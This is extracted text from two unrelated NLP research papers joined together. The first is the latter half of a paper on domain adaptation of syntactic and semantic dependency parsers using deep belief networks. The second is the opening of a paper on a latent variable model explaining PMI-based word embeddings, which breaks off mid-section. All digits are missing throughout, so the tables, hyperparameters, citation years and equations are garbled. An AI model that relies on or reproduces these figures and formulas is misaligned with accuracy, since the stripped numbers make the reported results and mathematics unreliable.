models do not adapt well to the target do- main. so we use the lfr of our dbn model to train new syntactic and semantic parsing models. we will refer to the new syntactic parsing model as latsyn- model, and the new semantic parsing model as lat- semmodel. details of using our dbn model are as follows. . . adapting the syntactic parser the input data for training our dbn model are the original feature vectors on training and unla- beled data. therefore, to train our dbn model, we first need to extract the original features for syntactic parsing on these data. features on training data can be directly extracted using golden-standard annota- tions. on unlabeled data, however, some features cannot be directly extracted. this is because our syntactic parser uses history-based features which depend on previous actions taken when parsing a sentence. therefore, features on unlabeled data can only be extracted after the data are parsed. to solve this problem, we first parse the unlabeled data using the already trained orisynmodel. in this way, we can obtain the features on the unlabeled data. be- cause of the poor performance of the orisynmodel on the target domain, the extracted features on un- labeled data contains some noise. however, exper- iments show that our dbn model can still learn a good lfr despite the noise in the extracted features. using the lfr, we can train the syntactic parsing model latsynmodel. then by applying the lfr on test and unlabeled data, we can parse the data using latsynmodel. experiments in later sections show that the latsynmodel adapts much better to the tar- get domain than the orisynmodel. . . adapting the semantic parser the situation here is similar to the adaptation of the syntactic parser. features on training data can be directly extracted. to extract features on unla- beled data, we need to have syntactic dependency trees on this data. so we use our latsynmodel to parse the unlabeled data first. and we automatically identify predicates on unlabeled data using a clas- sifier as in che et al., ( ). then we extract the original features for semantic parsing on unlabeled data. by feeding original features extracted on these data to our dbn model, we learn the lfr for se- mantic dependency parsing. using the lfr, we can train the semantic parsing model latsemmodel. experiments . experiment setup . . experiment data we use the english data in the conll shared task for experiments. the training data and in-domain test data are from the wsj corpus, whereas the out-of-domain test data is from the brown corpus. we also use unlabeled data consist- ing of the following sections of the brown corpus: k, l, m, n, p. the test data are excerpts from fic- tions. the unlabeled data are also excerpts from fic- tions or stories, which are similar to the test data. although the unlabeled data is actually annotated in release of the penn treebank, we do not use any information contained in the annotation, only using the raw texts. the training, test and unlabeled data contains , , and sentences respec- tively. . . settings of our dbn model for the syntactic parsing task, there are , original features in total. we use , hidden vari- ables in the first layer and , hidden variables in the second layer. for semantic parsing, there are , , original features. we use , hidden variables in the first layer and , hidden variables in the second layer. in our dbn models, we need to determine the number of groups k. because larger k means less computational cost, k should not be set too small. we empirically set k as follows: according to our experience, each group should contain about original features. we have about original fea- tures in our tasks. so we estimate k ≈ / = . and we set k to be in the dbn models for both syntactic and semantic parsing. as for split- ting strategy, we use the more sophisticated one in subsection . . because it should generate better re- sults than the simple one. . . details of dbn training in greedy pretraining of the dbn, the contrastive divergence algorithm is configured as follows: the training data is divided to mini-batches, each con- taining samples. the weights are updated with a learning rate of . , momentum of . , weight de- cay of . . each layer is trained for passes (epochs) over the entire training data. in fine-tuning, the backpropagation algorithm is configured as follows: the training data is divided to mini-batches, each containing samples. the weights are updated with a learning rate of . , mo- mentum of . , weight decay of . . the fine- tuning is repeated for epochs over the entire train- ing data. we use the fast computing technique in raina et al., ( ) to learn the lfrs. moreover, in greedy pretraining, we train rbms in the first layer in par- allel. . results and discussion we use the official evaluation measures of the conll shared task, which consist of three dif- ferent scores: (i) syntactic dependencies are scored using the labeled attachment score, (ii) semantic de- pendencies are evaluated using a labeled f score, and (iii) the overall task is scored with a macro av- test data system las sem f macro f wsj ori . . . lat . . . brown ori . . . lat . . . table : the results of our basic and adapted systems erage of the two previous scores. the three scores above are represented by las, sem f , and macro f respectively in this paper. . . comparison with un-adapted system our basic system uses the orisynmodel for syn- tactic parsing, and the orisemmodel for semantic parsing. our adapted system uses the latsynmodel for syntactic parsing, and the latsemmodel for se- mantic parsing. the results of these two systems are shown in table , in which our basic and adapted systems are denoted as ori and lat respectively. from the results in table , we can see that lat performs slightly worse than ori on in-domain wsj test data. but on the out-of-domain brown test data, lat performs much better than ori, with points im- provement in macro f score. this shows the effec- tiveness of our method for domain adaptation tasks. . . different splitting configurations as described in subsection . . , we have em- pirically set the number of groups k to be and chosen the more sophisticated splitting strategy. in this subsection, we experiment with different split- ting configurations to see their effects. under each splitting configuration, we learn the lfrs using our the dbn models. using the lfrs, we test the our adapted systems on both in-domain and out-of-domain data. therefore we get many test results, each corresponding to a splitting configura- tion. the in-domain and out-of-domain test results are reported in table and table respectively. in these two tables, ‘s ’ and ‘s ’ represents the sim- ple and the more sophisticated splitting strategies in subsection . . respectively. ‘k’ represents the number of groups in our dbn models. for both syntactic and semantic parsing, we use the same k in their dbn models. the ‘time’ column reports the training time of our dbn models for both syn- tactic and semantic parsing. the unit of the ‘time’ str k time(h) las sem f macro f s . . . . . . . . . . . . s . . . . . . . . . . . . table : results of different splitting configurations on in-domain wsj development data str k time(h) las sem f macro f s . . . . . . . . . . . . s . . . . . . . . . . . . table : results of different splitting configurations on out-of-domain brown test data column is the hour. please note that we only need to train our dbn models once. and we report the training time in table . for easy viewing, we re- peat those training times in table . but this does not mean we need to train new dbn models for out- of-domain test. from tables and we get the following obser- vations: first, although the more sophisticated splitting strategy ‘s ’ generate slightly better result than the simple strategy ‘s ’, the difference is not signifi- cant. this means that the hierarchical structure of our dbn model can robustly capture the relation- ships between features. even with the simple split- ting strategy ‘s ’, we still get quite good results. second, the ‘time’ column in table shows that different splitting strategies with the same k value has the same training time. this is reasonable be- cause training time only depends on the number of parameters in our dbn model. and different split- ting strategies do not affect the number of parame- ters in our dbn model. third, the number of groups k affects both the training time and the final results. when k increases, the training time reduces but the results degrade. as k gets larger, the time reduction gets less obvious, but the degradation of results gets more obvious. when k = , , , there is not much differ- ence between the results. this shows that the results of our dbn model is not sensitive to the values of k within a range of around our initial estima- tion . but when k is further away from our es- timation, e.g. k = , the results get significantly worse. please note that the results in tables and are not used to tune the parameter k or to choose a split- ting strategy in our dbn model. as mentioned in subsection . . , we have chosen k = and the more sophisticated splitting strategy beforehand. in this paper, we always use the results with k = and the ‘s ’ strategy as our main results, even though the results with k = are better. . the size of unlabeled target domain data an interesting question for our method is how much unlabeled target domain data should be used. to em- pirically answer this question, we learn several lfrs by gradually adding more unlabeled data to train our dbn model. we compared the performance of these lfrs as shown in figure . target domain test source domain test figure : macro f scores on test data with respect to the size of unlabeled target domain data used in dbn train- ing. the horizontal axis is the number of sentences in unlabeled target domain data and the coordinate axis is the macro f score. from figure , we can see that by adding more unlabeled target domain data, our system adapts bet- ter to the target domain with only small degradation of result on source domain. however, with more un- labeled data used, the improvement on target domain result gradually gets smaller. . comparison with other methods in this subsection, we compare our method with sev- eral systems. these are described below. daume . daumé iii ( ) proposed a simple and effective adaptation method by augmenting fea- ture vector. its main idea is to augment the feature vector. they took each feature in the original prob- lem and made three versions of it: a general version, a source-specific version and a target-specific ver- sion. thus, the augmented source data contains only general and source-specific versions; the augmented target data contains general and target-specific ver- sions. in the baseline system, we adopt the same technique for dependency and semantic parsing. chen. the participation system of zhao et al., ( ), reached the best result in the out-of-domain test of the conll shared task. in daumé iii and and marcu ( ), they pre- sented and discussed several ‘obvious’ ways to at- tack the domain adaptation problem without devel- oping new algorithms. following their idea, we con- struct similar systems. onlysrc. the system is trained on only the data of the source domain (news). onlytgt. the system is trained on only the data of the target domain (fiction). all. the system is trained on all data of the source domain and the target domain. it is worth noting that training the systems of daume , onlytgt and all need the labeled data of the target domain. we utilize onlysrc to parse the unlabeled data of the target domain to generate the labeled data. all comparison results are shown in table , in which the ‘diff’ column is the difference of scores on in-domain and out-of-domain test data. first, we compare onlysrc, onlytgt and all. we can see that onlytgt performs very poor both in the source domain and in the target domain. it is not hard to understand that onlytgt performs poor in the source domain because of the adaptation prob- lem. onlytgt also performs poor in the target do- main. we think the main reason is that onlytgt is trained on the auto parsed data in which there are score system wsj brown diff las onlysrc . . . onlytgt . . . all . . . daume . . . chen . . . ours . . . sem f onlysrc . . . onlytgt . . . all . . . daume . . . chen . . . ours . . . macro f onlysrc . . . onlytgt . . . all . . . daume . . . chen . . . ours . . . table : comparison with other methods. many parsing errors. but we note that all performs better than both onlysrc and onlytgt on the target domain test, although its training data contains some auto parsed data. therefore, the data of the target domain, labeled or unlabeled, are potential in alle- viating the adaptation problem of different domains. but all just puts the auto parsed data of the target domain into the training set. thus, its improvement on the test data of the target domain is limited. in fact, how to use the data of the target domain, espe- cially the unlabeled data, in the adaptation problem is still an open and hot topic in nlp and machine learning. second, we compare daume , all and our method. in daume , they reported improvement on the target domain test. but one point to note is that the target domain data used in their experi- ments is labeled while in our case there is only un- labeled data. we can see daume have compara- ble performance with all in which there is not any adaptation strategy besides adding more data of the target domain. we think the main reason is that there are many parsing errors in the data of the tar- get domain. but our method performs much better than daume and all even though some faulty data are also utilized in our system. this suggests that our method successfully learns new robust represen- tations for different domains, even when there are some noisy data. third, we compare chen with our method. chen reached the best result in the out-of-domain test of the conll shared task. the results in table show that chen’s system performs better than ours on in-domain test data, especially on las score. chen’s system uses a sophisticated graph-based syn- tactic dependency parser. graph-based parsers use substantially more features, e.g. more than . × features are used in mcdonald et al., ( ). learning an lfr for that many features would take months of time using our dbn model. so at present we only use a transition-based parser. the better per- formance of chen’s system mainly comes from their sophisticated syntactic parsing method. to reduce the sparsity of features, chen’s sys- tem uses word cluster features as in koo et al., ( ). on out-of-domain tests, however, our sys- tem still performs much better than chen’s, espe- cially on semantic parsing. to our knowledge, on out-of-domain tests on this data set, our system has obtained the best performance to date. more im- portantly, the performance difference between indo- main and out-of-domain tests is much smaller in our system. this shows that our system adapts much better to the target domain. conclusions in this paper, we propose a dbn model to learn lfrs for syntactic and semantic parsers. these lfrs are common representations of original fea- tures in both source and target domains. syntactic and semantic parsers using the lfrs adapt to tar- get domain much better than the same parsers us- ing original feature representation. our model pro- vides a unified method that adapts both syntactic and semantic dependency parsers to a new domain. in the future, we hope to further scale up our method to adapt parsing models using substantially more features, such as graph-based syntactic dependency parsing models. we will also search for better split- ting strategies for our dbn model. finally, although our experiments are conducted on syntactic and se- mantic parsing, it is expected that the proposed ap- proach can be applied to the domain adaptation of other tasks with little adaptation efforts. acknowledgements the research work has been partially funded by the natural science foundation of china under grant no. and supported by the west light foundation of chinese academy of sciences under grant no.lhxz . we thank the three anony- mous reviewers and the action editor for their help- ful comments and suggestions. references yoshua bengio. . learning deep architectures for ai. in foundations and trends in machine learning, ( ): - . john blitzer, ryan mcdonald and fernando pereira. . domain adaptation with sturctural correspon- dance learning. in proceedings of acl- . wanxiang che, zhenghua li, yuxuan hu, yongqiang li, bing qin, ting liu and sheng li. . a cascaded syntactic and semantic dependency parsing system. in proceedings of conll- shared task. wanxiang che, zhenghua li, yongqiang li, yuhang guo, bing qin and ting liu. . multilingual dependency-based syntactic and semantic parsing. in proceedings of conll- shared task. wenliang chen, youzhengwu and hitoshi isahara. . learning reliable information for dependency parsing adaptation. in proceedings of coling- . hal daumé iii. . frustratingly easy domain adap- tation. in proceedings of acl- . hal daumé iii and daniel marcu. . domain adap- tation for statistical classifer. in journal of artificial intelligence research, ( ), - . mark dredze, john blitzer, partha p. talukdar, kuzman ganchev, joao graca and fernando pereira. . frustratingly hard domain adaptation for depen- dency parsing. in proceedings of emnlp-conll- . xavier glorot, antoine bordes and yoshua bengio. . domain adaptation for large-scale sentiment classification: a deep learning approach. in pro- ceedings of international conference on machine learning (icml) . daniel gildea and daniel jurafsky. . automatic la- beling for semantic roles. in computational linguis- tics, ( ): - . i. goodfellow, q. le, a. saxe and a. ng. . mea- suring invariances in deep networks. in proceedings of advances in neural information processing sys- tems(nips) . jan hajič, massimiliano ciaramita, richard johans- son, daisuke kawahara, maria antònia martı́, lluı́s màrquez, adam meyers, joakim nivre, sebastian padó, jan štěpánek, pavel straňák, mihai surdeanu, nianwen xue and yi zhang. . the conll- shared task: syntactic and semantic dependencies in multiple languages. in proceedings of conll- . j. hall, j. nilsson, j. nivre, g. eryiǧit, b. megyesi, m. nilsson, and m. saers. . single malt or blended? a study in multilingual parser optimization. in pro- ceedings of emnlp-conll- . geoffrey hinton. . a practical guide to train- ing restricted boltzmann machines. in technical re- port - , machine learning group, university of toronto. geoffrey hinton. . training products of experts by minimizing constrastive divergence. in neural com- putation, ( ): - . geoffrey hinton, simon osindero and yee-whye teh. . a fast learning algorithm for deep belief nets. in neural computation, ( ): - . geoffrey hinton and r. salakhutdinov. . reducing the dimensionality of data with neural networks. in science, ( ), - . richard johansson and pierre nugues. . dependency-based semantic role labeling of prop- bank. in proceedings of emnlp- . terry koo, xavier carreras and michael collins. . simple semi-supervised dependency parsing. in pro- ceedings of acl-hlt- . lluı́s màrquez, xavier carreras, kenneth c.litkowski and suzanne stevenson. . semantic role label- ing: an introduction to the special issue. in compu- tational linguistics, ( ): - . ryan mcdonald, fernando pereira, jan hajˇc, and kiril ribarov. . non-projective dependency parsing using spanning tree algortihms. in proceedings of naacl-hlt- . j. nivre, j. hall, s. kübler, r. mcdonald, j. nilsson, s. riedel, and d. yuret. . the conll shared task on dependency parsing. in proceedings of conll- . j. nivre, j. hall, j. nilsson, g. eryiǧit and s. marinov. . labeled pseudo-projective dependency parsing with support vector machines. in proceedings of conll- . j. nivre, and j. nilsson. . pseudo-projective depen- dency parsing. in proceedings of acl- . rajat raina, anand madhavan, and andrew y. ng. . large-scale deep unsupervised learning us- ing graphics processors. in proceedings of the th annual international conference on machine learn- ing(icml), pages - . mihai surdeanu, richard johansson, adam meyers, lluı́s màrquez and joakim nivre. . the conll- shared task on joint parsing of syntactic and semantic dependencies. in proceedings of conll- . ivan titov. . domain adaptation by constraining inter-domain variability of latent feature represen- tation. in proceedings of acl- . joseph turian, lev ratinov and yoshua bengio. . word representations: a simple and general method for semi-supervised learning. in proceedings of acl- . j. weston, f. rattle, and r. collobert. . deep learn- ing via semi-supervised embedding. in proceed- ings of international conference on machine learn- ing(icml). nianwen xue and martha palmer. . calibrating fea- tures for semantic role labeling. in proceedings of emnlp- . haitong yang and chengqing zong. . multi- predicate semantic role labeling. in proceedings of emnlp- . hai zhao, wenliang chen, chunyu kit, guodong zhou. . multilingual dependency learning: exploiting rich features for tagging syntactic and semantic de- pendencies. in proceedings of conll- shared task. hai zhao and chunyu kit. . parsing syntactic and semantic dependencies with two single-stage max- imum entropy models. in proceedings of conll- . tao zhuang and chengqing zong. a. a minimum error weighting combination strategy for chinese se- mantic role labeling. in proceedings of coling . tao zhuang and chengqing zong. b. joint inference for bilingual semantic role labeling. in proceedings of emnlp . a latent variable model approach to pmi-based word embeddings sanjeev arora, yuanzhi li, yingyu liang, tengyu ma, andrej risteski computer science department, princeton university olden st, princeton, nj {arora,yuanzhil,yingyul,tengyu,risteski}@cs.princeton.edu abstract semantic word embeddings represent the meaning of a word via a vector, and are cre- ated by diverse methods. many use non- linear operations on co-occurrence statistics, and have hand-tuned hyperparameters and reweighting methods. this paper proposes a new generative model, a dynamic version of the log-linear topic model of mnih and hinton ( ). the method- ological novelty is to use the prior to com- pute closed form expressions for word statis- tics. this provides a theoretical justifica- tion for nonlinear models like pmi, word vec, and glove, as well as some hyperparame- ter choices. it also helps explain why low- dimensional semantic embeddings contain lin- ear algebraic structure that allows solution of word analogies, as shown by mikolov et al. ( a) and many subsequent papers. experimental support is provided for the gen- erative model assumptions, the most impor- tant of which is that latent word vectors are fairly uniformly dispersed in space. introduction vector representations of words (word embeddings) try to capture relationships between words as dis- tance or angle, and have many applications in com- putational linguistics and machine learning. they are constructed by various models whose unify- ing philosophy is that the meaning of a word is defined by “the company it keeps” (firth, ), namely, co-occurrence statistics. the simplest meth- ods use word vectors that explicitly represent co- occurrence statistics. reweighting heuristics are known to improve these methods, as is dimension reduction (deerwester et al., ). some reweight- ing methods are nonlinear, which include taking the square root of co-occurrence counts (rohde et al., ), or the logarithm, or the related pointwise mu- tual information (pmi) (church and hanks, ). these are collectively referred to as vector space models, surveyed in (turney and pantel, ). neural network language models (rumelhart et al., ; rumelhart et al., ; bengio et al., ; collobert and weston, a) propose an- other way to construct embeddings: the word vec- tor is simply the neural network’s internal repre- sentation for the word. this method is nonlinear and nonconvex. it was popularized via word vec, a family of energy-based models in (mikolov et al., b; mikolov et al., c), followed by a ma- trix factorization approach called glove (penning- ton et al., ). the first paper also showed how to solve analogies using linear algebra on word em- beddings. experiments and theory were used to sug- gest that these newer methods are related to the older pmi-based models, but with new hyperparameters and/or term reweighting methods (levy and gold- berg, b). but note that even the old pmi method is a bit mysterious. the simplest version considers a sym- metric matrix with each row/column indexed by a word. the entry for (w,w′) is pmi(w,w′) = log p(w,w′) p(w)p(w′) , where p(w,w ′) is the empirical prob- ability of words w,w′ appearing within a window of certain size in the corpus, and p(w) is the marginal transactions of the association for computational linguistics, vol. , pp. – , . action editor: daichi mochihashi. submission batch: / ; revision batch: / ; / ; published / . c© association for computational linguistics. distributed under a cc-by . license. probability of w. (more complicated models could use asymmetric matrices with columns correspond- ing to context words or phrases, and also involve ten- sorization.) then word vectors are obtained by low- rank svd on this matrix, or a related matrix with term reweightings. in particular, the pmi matrix is found to be closely approximated by a low rank ma- trix: there exist word vectors in say dimensions, which is much smaller than the number of words in the dictionary, such that 〈vw,vw′〉≈ pmi(w,w′) ( . ) where ≈ should be interpreted loosely. there appears to be no theoretical explanation for this empirical finding about the approximate low rank of the pmi matrix. the current paper addresses this. specifically, we propose a probabilistic model of text generation that augments the log-linear topic model of mnih and hinton ( ) with dynamics, in the form of a random walk over a latent discourse space. the chief methodological contribution is us- ing the model priors to analytically derive a closed- form expression that directly explains ( . ); see the- orem . in section . section builds on this in- sight to give a rigorous justification for models such as word vec and glove, including the hyperparam- eter choices for the latter. the insight also leads to a mathematical explanation for why these word em- beddings allow analogies to be solved using linear algebra; see section . section shows good empir- ical fit to this model’s assumtions and predictions, including the surprising one that word vectors are pretty uniformly distributed (isotropic) in space. . related work latent variable probabilistic models of language have been used for word embeddings before, includ- ing latent dirichlet allocation (lda) and its more complicated variants (see the survey (blei, )), and some neurally inspired nonlinear models (mnih and hinton, ; maas et al., ). in fact, lda evolved out of efforts in the s to provide a gen- erative model that “explains” the success of older vector space methods like latent semantic index- ing (papadimitriou et al., ; hofmann, ). however, none of these earlier generative models has been linked to pmi models. levy and goldberg ( b) tried to relate word vec to pmi models. they showed that if there were no dimension constraint in word vec, specifically, the “skip-gram with negative sampling (sgns)” version of the model, then its solutions would satisfy ( . ), provided the right hand side were replaced by pmi(w,w′)−β for some scalar β. however, skip-gram is a discriminative model (due to the use of negative sampling), not generative. fur- thermore, their argument only applies to very high- dimensional word embeddings, and thus does not address low-dimensional embeddings, which have superior quality in applications. hashimoto et al. ( ) focuses on issues simi- lar to our paper. they model text generation as a random walk on words, which are assumed to be embedded as vectors in a geometric space. given that the last word produced was w, the probability that the next word is w′ is assumed to be given by h(|vw − vw′| ) for a suitable function h, and this model leads to an explanation of ( . ). by contrast our random walk involves a latent discourse vector, which has a clearer semantic interpretation and has proven useful in subsequent work, e.g. understand- ing structure of word embeddings for polysemous words arora et al. ( ). also our work clarifies some weighting and bias terms in the training objec- tives of previous methods (section ) and also the phenomenon discussed in the next paragraph. researchers have tried to understand why vec- tors obtained from the highly nonlinear word vec models exhibit linear structures (levy and goldberg, a; pennington et al., ). specifically, for analogies like “man:woman::king:??,” queen hap- pens to be the word whose vector vqueen is the most similar to the vector vking − vman + vwoman. this suggests that simple semantic relationships, such as masculine vs feminine tested in the above example, correspond approximately to a single direction in space, a phenomenon we will henceforth refer to as relations=lines. section surveys earlier attempts to explain this phenomenon and their shortcoming, namely, that they ignore the large approximation error in rela- tionships like ( . ). this error appears larger than the difference between the best solution and the sec- ond best (incorrect) solution in analogy solving, so that this error could in principle lead to a complete failure in analogy solving. in our explanation, the low dimensionality of the word vectors plays a key role. this can also be seen as a theoretical expla- nation of the old observation that dimension reduc- tion improves the quality of word embeddings for various tasks. the intuitive explanation often given —that smaller models generalize better—turns out to be fallacious, since the training method for cre- ating embeddings makes no reference to analogy solving. thus there is no a priori reason why low- dimensional model parameters (i.e., lower model ca- pacity) should lead to better performance in anal- ogy solving, just as there is no reason they are bet- ter at some other unrelated task like predicting the weather. . benefits of generative approaches in addition to giving some form of “unification” of existing methods, our generative model also brings more intepretability to word embeddings beyond tra- ditional cosine similarity and even analogy solving. for example, it led to an understanding of how the different senses of a polysemous word (e.g., bank) reside in linear superposition within the word em- bedding (arora et al., ). such insight into em- beddings may prove useful in the numerous settings in nlp and neuroscience where they are used. another new explanatory feature of our model is that low dimensionality of word embeddings plays a key theoretical role —unlike in previous papers where the model is agnostic about the di- mension of the embeddings, and the superiority of low-dimensional embeddings is an empirical finding (starting with deerwester et al. ( )). specifically, our theoretical analysis makes the key assumption that the set of all word vectors (which are latent vari- ables of the generative model) are spatially isotropic, which means that they have no preferred direction in space. having n vectors be isotropic in d dimen- sions requires d � n. this isotropy is needed in the calculations (i.e., multidimensional integral) that yield ( . ). it also holds empirically for our word vectors, as shown in section . the isotropy of low-dimensional word vectors also plays a key role in our explanation of the relations=lines phenomenon (section ). the isotropy has a “purification” effect that mitigates the effect of the (rather large) approximation error in the pmi models. generative model and its properties the model treats corpus generation as a dynamic process, where the t-th word is produced at step t. the process is driven by the random walk of a dis- course vector ct ∈ <d. its coordinates represent what is being talked about. each word has a (time- invariant) latent vector vw ∈<d that captures its cor- relations with the discourse vector. we model this bias with a log-linear word production model: pr[w emitted at time t | ct] ∝ exp(〈ct,vw〉). ( . ) the discourse vector ct does a slow random walk (meaning that ct+ is obtained from ct by adding a small random displacement vector), so that nearby words are generated under similar discourses. we are interested in the probabilities that word pairs co- occur near each other, so occasional big jumps in the random walk are allowed because they have negligi- ble effect on these probabilities. a similar log-linear model appears in mnih and hinton ( ) but without the random walk. the linear chain crf of collobert and weston ( b) is more general. the dynamic topic model of blei and lafferty ( ) utilizes topic dynamics, but with a linear word production model. belanger and kakade ( ) have proposed a dynamic model for text us- ing kalman filters, where the sequence of words is generated from gaussian linear dynamical systems, rather than the log-linear model in our case. the novelty here over such past works is a the- oretical analysis in the method-of-moments tradi- tion (hsu et al., ; cohen et al., ). assuming a prior on the random walk we analytically integrate out the hidden random variables and compute a sim- ple closed form expression that approximately con- nects the model parameters to the observable joint probabilities (see theorem . ). this is reminis- cent of analysis of similar random walk models in finance (black and scholes, ). model details. let n denote the number of words and d denote the dimension of the discourse space, where ≤ d ≤ n. inspecting ( . ) suggests word this is a different interpretation of the term “discourse” compared to some other settings in computational linguistics. vectors need to have varying lengths, to fit the empir- ical finding that word probabilities satisfy a power law. furthermore, we will assume that in the bulk, the word vectors are distributed uniformly in space, earlier referred to as isotropy. this can be quantified as a prior in the bayesian tradition. more precisely, the ensemble of word vectors consists of i.i.d draws generated by v = s · v̂, where v̂ is from the spher- ical gaussian distribution, and s is a scalar random variable. we assume s is a random scalar with ex- pectation τ = Θ( ) and s is always upper bounded by κ, which is another constant. here τ governs the expected magnitude of 〈v,ct〉, and it is particularly important to choose it to be Θ( ) so that the distribu- tion pr[w|ct] ∝ exp(〈vw,ct〉) is interesting. more- over, the dynamic range of word probabilities will roughly equal exp(κ ), so one should think of κ as an absolute constant like . these details about s are important for realistic modeling but not too impor- tant in our analysis. (furthermore, readers uncom- fortable with this simplistic bayesian prior should look at section . below.) finally, we clarify the nature of the random walk. we assume that the stationary distribution of the ran- dom walk is uniform over the unit sphere, denoted by c. the transition kernel of the random walk can be in any form so long as at each step the movement of the discourse vector is at most � / √ d in ` norm. this is still fast enough to let the walk mix quickly in the space. the following lemma (whose proof appears in the appendix) is central to the analysis. it says that un- der the bayesian prior, the partition function zc =∑ w exp(〈vw,c〉), which is the implied normaliza- tion in equation ( . ), is close to some constant z for most of the discourses c. this can be seen as a plausible theoretical explanation of a phenomenon called self-normalization in log-linear models: ig- noring the partition function or treating it as a con- stant (which greatly simplifies training) is known to often give good results. this has also been studied a larger τ will make pr[w|ct] too peaked and a smaller one will make it too uniform. more precisely, the proof extends to any symmetric prod- uct stationary distribution c with sub-gaussian coordinate sat- isfying ec [ ‖c‖ ] = , and the steps are such that for all ct, ep(ct+ |ct)[exp(κ √ d‖ct+ − ct‖)] ≤ + � for some small � . in (andreas and klein, ). lemma . (concentration of partition functions). if the word vectors satisfy the bayesian prior de- scribed in the model details, then pr c∼c [( − �z)z ≤ zc ≤ ( + �z)z] ≥ −δ, ( . ) for �z = õ( / √ n), and δ = exp(−Ω(log n)). the concentration of the partition functions then leads to our main theorem (the proof is in the ap- pendix). the theorem gives simple closed form approximations for p(w), the probability of word w in the corpus, and p(w,w′), the probability that two words w,w′ occur next to each other. the theorem states the result for the window size q = , but the same analysis works for pairs that appear in a small window, say of size , as stated in corollary . . recall that pmi(w,w′) = log[p(w,w′)/(p(w)p(w′))]. theorem . . suppose the word vectors satisfy the inequality ( . ), and window size q = . then, log p(w,w′) = ‖vw + vw′‖ d − log z ± �, ( . ) log p(w) = ‖vw‖ d − log z ± �. ( . ) for � = o(�z) + õ( /d) + o(� ). jointly these imply: pmi (w,w′) = 〈vw,vw′〉 d ±o(�). ( . ) remarks . since the word vectors have ` norm of the order of √ d, for two typical word vectors vw,vw′ , ‖vw + vw′‖ is of the order of Θ(d). there- fore the noise level � is very small compared to the leading term d ‖vw + vw′‖ . for pmi however, the noise level o(�) could be comparable to the leading term, and empirically we also find higher error here. remarks . variants of the expression for joint probability in ( . ) had been hypothesized based upon empirical evidence in mikolov et al. ( b) and also globerson et al. ( ), and maron et al. ( ) . remarks . theorem . directly leads to the ex- tension to a general window size q as follows: corollary . . let pq(w,w′) be the co-occurrence probability in windows of size q, and pmiq(w,w′) be the corresponding pmi value. then log pq(w,w ′) = ‖vw + vw′‖ d − log z + γ ± �, pmiq (w,w ′) = 〈vw,vw′〉 d + γ ±o(�). where γ = log ( q(q− ) ) . it is quite easy to see that theorem . implies the corollary . , as when the window size is q the pair w,w′ could appear in any of ( q ) positions within the window, and the joint probability of w,w′ is roughly the same for any positions because the discourse vector changes slowly. (of course, the er- ror term gets worse as we consider larger window sizes, although for any constant size, the statement of the theorem is correct.) this is also consistent with the shift β for fitting pmi in (levy and gold- berg, b), which showed that without dimension constraints, the solution to skip-gram with negative sampling satisfies pmi (w,w′) −β = 〈vw,vw′〉 for a constant β that is related to the negative sampling in the optimization. our result justifies via a genera- tive model why this should be satisfied even for low dimensional word vectors. . weakening the model assumptions for readers uncomfortable with bayesian priors, we can replace our assumptions with concrete proper- ties of word vectors that are empirically verifiable (section . ) for our final word vectors, and in fact also for word vectors computed using other recent methods. the word meanings are assumed to be represented by some “ground truth” vectors, which the experi- menter is trying to recover. these ground truth vec- tors are assumed to be spatially isotropic in the bulk, in the following two specific ways: (i) for almost all unit vectors c the sum ∑ w exp(〈vw,c〉) is close to a constant z; (ii) singular values of the matrix of word vectors satisfy properties similar to those of random matrices, as formalized in the paragraph be- fore theorem . . our bayesian prior on the word vectors happens to imply that these two conditions hold with high probability. but the conditions may hold even if the prior doesn’t hold. furthermore, they are compatible with all sorts of local structure among word vectors such as existence of cluster- ings, which would be absent in truly random vectors drawn from our prior. training objective and relationship to other models to get a training objective out of theorem . , we reason as follows. let xw,w′ be the number of times words w and w′ co-occur within the same window in the corpus. the probability p(w,w′) of such a co-occurrence at any particular time is given by ( . ). successive samples from a random walk are not independent. but if the random walk mixes fairly quickly (the mixing time is related to the log- arithm of the vocabulary size), then the distribution of xw,w′ ’s is very close to a multinomial distribu- tion mul(l̃,{p(w,w′)}), where l̃ = ∑ w,w′ xw,w′ is the total number of word pairs. assuming this approximation, we show below that the maximum likelihood values for the word vectors correspond to the following optimization, min {vw},c ∑ w,w′ xw,w′ ( log(xw,w′ ) −‖vw +vw′‖ −c ) as is usual, empirical performance is improved by weighting down very frequent word pairs, possibly because very frequent words such as “the” do not fit our model. this is done by replacing the weighting xw,w′ by its truncation min{xw,w′,xmax} where xmax is a constant such as . we call this objec- tive with the truncated weights sn (squared norm). we now give its derivation. maximizing the like- lihood of {xw,w′} is equivalent to maximizing ` = log   ∏ (w,w′) p(w,w′)xw,w′   . denote the logarithm of the ratio between the ex- pected count and the empirical count as ∆w,w′ = log ( l̃p(w,w′) xw,w′ ) . ( . ) then with some calculation, we obtain the following where c is independent of the empirical observations xw,w′ ’s. ` = c + ∑ (w,w′) xw,w′ ∆w,w′ ( . ) on the other hand, using ex ≈ +x+x / when x is small, we have l̃ = ∑ (w,w′) l̃pw,w′ = ∑ (w,w′) xw,w′e ∆w,w′ ≈ ∑ (w,w′) xw,w′ ( + ∆w,w′ + ∆ w,w′ ) . note that l̃ = ∑ (w,w′) xw,w′ , so ∑ (w,w′) xw,w′ ∆w,w′ ≈− ∑ (w,w′) xw,w′ ∆ w,w′. plugging this into ( . ) leads to (c− `) ≈ ∑ (w,w′) xw,w′ ∆ w,w′. ( . ) so maximizing the likelihood is approximately equivalent to minimizing the right hand side, which (by examining ( . )) leads to our objective. objective for training with pmi. a similar ob- jective pmi can be obtained from ( . ), by com- puting an approximate mle, using the fact that the error between the empirical and true value of pmi(w,w′) is driven by the smaller term p(w,w′), and not the larger terms p(w),p(w′). min {vw},c ∑ w,w′ xw,w′ ( pmi(w,w′) −〈vw,vw′〉 ) this is of course very analogous to classical vsm methods, with a novel reweighting method. fitting to either of the objectives involves solving a version of weighted svd which is np-hard, but empirically seems solvable in our setting via ada- grad (duchi et al., ). this taylor series approximation has an error of the order of x , but ignoring it can be theoretically justified as follows. for a large xw,w′ , its value approaches its expectation and thus the corresponding ∆w,w′ is close to and thus ignoring ∆ w,w′ is well justified. the terms where ∆w,w′ is significant corre- spond to xw,w′ ’s that are small. but empirically, xw,w′ ’s obey a power law distribution (see, e.g. pennington et al. ( )) us- ing which it can be shown that these terms contribute a small fraction of the final objective ( . ). so we can safely ignore the errors. full details appear in the arxiv version of this pa- per (arora et al., ). connection to glove. compare sn with the ob- jective used by glove (pennington et al., ): ∑ w,w′ f(xw,w′ )(log(xw,w′ )−〈vw,vw′〉−sw−sw′−c) with f(xw,w′ ) = min{x / w,w′, }. their weight- ing methods and the need for bias terms sw,sw′,c were derived by trial and error; here they are 